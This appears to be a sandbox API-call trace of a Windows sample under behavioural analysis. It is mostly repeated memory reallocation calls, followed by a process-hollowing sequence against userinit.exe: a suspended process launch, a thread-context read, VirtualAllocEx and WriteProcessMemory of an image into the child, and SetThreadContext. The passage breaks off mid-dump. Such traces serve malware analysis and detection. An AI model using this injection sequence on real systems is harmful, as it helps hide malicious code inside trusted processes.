[0239.500] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0239.501] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0239.501] GlobalUnlock (hMem=0x95000c) returned 0
[0239.501] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0239.502] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0239.503] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0239.503] GlobalUnlock (hMem=0x95000c) returned 0
[0239.503] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0239.504] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.504] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.504] GlobalUnlock (hMem=0x95000c) returned 0
[0239.505] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0239.505] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.506] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.506] GlobalUnlock (hMem=0x95000c) returned 0
[0239.506] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0239.506] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.507] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.507] GlobalUnlock (hMem=0x95000c) returned 0
[0239.507] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0239.507] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.508] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.508] GlobalUnlock (hMem=0x95000c) returned 0
[0239.508] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0239.508] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.509] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.509] GlobalUnlock (hMem=0x95000c) returned 0
[0239.509] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0239.509] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.510] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.510] GlobalUnlock (hMem=0x95000c) returned 0
[0239.510] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0239.510] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.511] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.511] GlobalUnlock (hMem=0x95000c) returned 0
[0239.511] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0239.511] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.512] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.512] GlobalUnlock (hMem=0x95000c) returned 0
[0239.512] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0239.512] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.513] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.513] GlobalUnlock (hMem=0x95000c) returned 0
[0239.513] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0239.513] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.514] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.514] GlobalUnlock (hMem=0x95000c) returned 0
[0239.514] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0239.516] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0239.517] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0239.517] GlobalUnlock (hMem=0x95000c) returned 0
[0239.517] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0239.517] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0239.518] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0239.518] GlobalUnlock (hMem=0x95000c) returned 0
[0239.518] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0239.520] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0239.521] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0239.521] GlobalUnlock (hMem=0x95000c) returned 0
[0239.521] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0239.521] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.522] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.522] GlobalUnlock (hMem=0x95000c) returned 0
[0239.522] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0239.522] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.523] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.523] GlobalUnlock (hMem=0x95000c) returned 0
[0239.523] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0239.523] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.524] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.524] GlobalUnlock (hMem=0x95000c) returned 0
[0239.524] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0239.524] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.524] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.524] GlobalUnlock (hMem=0x95000c) returned 0
[0239.525] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0239.525] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.525] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.525] GlobalUnlock (hMem=0x95000c) returned 0
[0239.525] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0239.525] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.526] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.526] GlobalUnlock (hMem=0x95000c) returned 0
[0239.526] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0239.526] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.527] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.527] GlobalUnlock (hMem=0x95000c) returned 0
[0239.527] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0239.527] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.528] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.528] GlobalUnlock (hMem=0x95000c) returned 0
[0239.528] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0239.528] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.529] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.529] GlobalUnlock (hMem=0x95000c) returned 0
[0239.529] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0239.529] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.530] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.530] GlobalUnlock (hMem=0x95000c) returned 0
[0239.530] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0239.530] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.531] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.531] GlobalUnlock (hMem=0x95000c) returned 0
[0239.533] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0239.533] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.533] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.533] GlobalUnlock (hMem=0x95000c) returned 0
[0239.533] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0239.533] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.534] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.534] GlobalUnlock (hMem=0x95000c) returned 0
[0239.534] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0239.534] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.535] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.535] GlobalUnlock (hMem=0x95000c) returned 0
[0239.535] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0239.535] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.536] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.536] GlobalUnlock (hMem=0x95000c) returned 0
[0239.536] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0239.536] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.537] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.537] GlobalUnlock (hMem=0x95000c) returned 0
[0239.537] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0239.537] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.538] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.538] GlobalUnlock (hMem=0x95000c) returned 0
[0239.538] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0239.538] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.539] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.539] GlobalUnlock (hMem=0x95000c) returned 0
[0239.539] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0239.539] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.540] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.540] GlobalUnlock (hMem=0x95000c) returned 0
[0239.540] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0239.540] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.541] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.541] GlobalUnlock (hMem=0x95000c) returned 0
[0239.541] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0239.541] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.542] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.542] GlobalUnlock (hMem=0x95000c) returned 0
[0239.542] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0239.542] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.543] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.543] GlobalUnlock (hMem=0x95000c) returned 0
[0239.543] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0239.543] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.544] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.544] GlobalUnlock (hMem=0x95000c) returned 0
[0239.544] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0239.544] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.545] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.545] GlobalUnlock (hMem=0x95000c) returned 0
[0239.545] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0239.545] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.545] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.545] GlobalUnlock (hMem=0x95000c) returned 0
[0239.545] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0239.546] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.546] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.546] GlobalUnlock (hMem=0x95000c) returned 0
[0239.546] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0239.546] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.547] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0239.547] GlobalUnlock (hMem=0x95000c) returned 0
[0239.547] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0239.547] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0239.548] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x15c, hThread=0x160, dwProcessId=0xa80, dwThreadId=0xa84)) returned 1
[0239.552] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0239.552] GetThreadContext (in: hThread=0x160, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0xcf2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x6fc30, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0239.552] ReadProcessMemory (in: hProcess=0x15c, lpBaseAddress=0x7ffde008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0239.552] VirtualAllocEx (hProcess=0x15c, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0239.553] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1d90000
[0239.553] VirtualAlloc (lpAddress=0x1d90000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d90000
[0239.554] VirtualAlloc (lpAddress=0x1d60000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d60000
[0239.559] WriteProcessMemory (in: hProcess=0x15c, lpBaseAddress=0x400000, lpBuffer=0x1d5c774*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x1d5c774*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0239.572] WriteProcessMemory (in: hProcess=0x15c, lpBaseAddress=0x7ffde008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0239.572] SetThreadContext (hThread=0x160, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x6fc30, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, 